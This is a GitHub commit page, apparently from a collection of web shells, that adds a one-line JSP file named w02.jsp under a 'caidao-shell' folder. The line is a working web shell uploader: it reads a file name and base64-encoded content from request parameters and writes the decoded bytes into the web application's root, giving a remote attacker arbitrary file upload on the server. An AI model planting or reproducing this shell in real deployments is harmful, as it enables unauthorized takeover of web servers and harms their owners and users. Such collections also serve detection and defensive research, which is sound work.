Skip to content

Commit

Permalink
Create w02.jsp
Browse files Browse the repository at this point in the history
  • Loading branch information
tennc committed May 29, 2016
1 parent 69249a2 commit 4db274e
Showing 1 changed file with 1 addition and 0 deletions.
1 change: 1 addition & 0 deletions caidao-shell/w02.jsp
Original file line number Diff line number Diff line change
@@ -0,0 +1 @@
<%new java.io.FileOutputStream(application.getRealPath("/")+"/"+request.getParameter("f")).write(new sun.misc.BASE64Decoder().decodeBuffer(request.getParameter("c")));out.close();%>

0 comments on commit 4db274e

Please sign in to comment.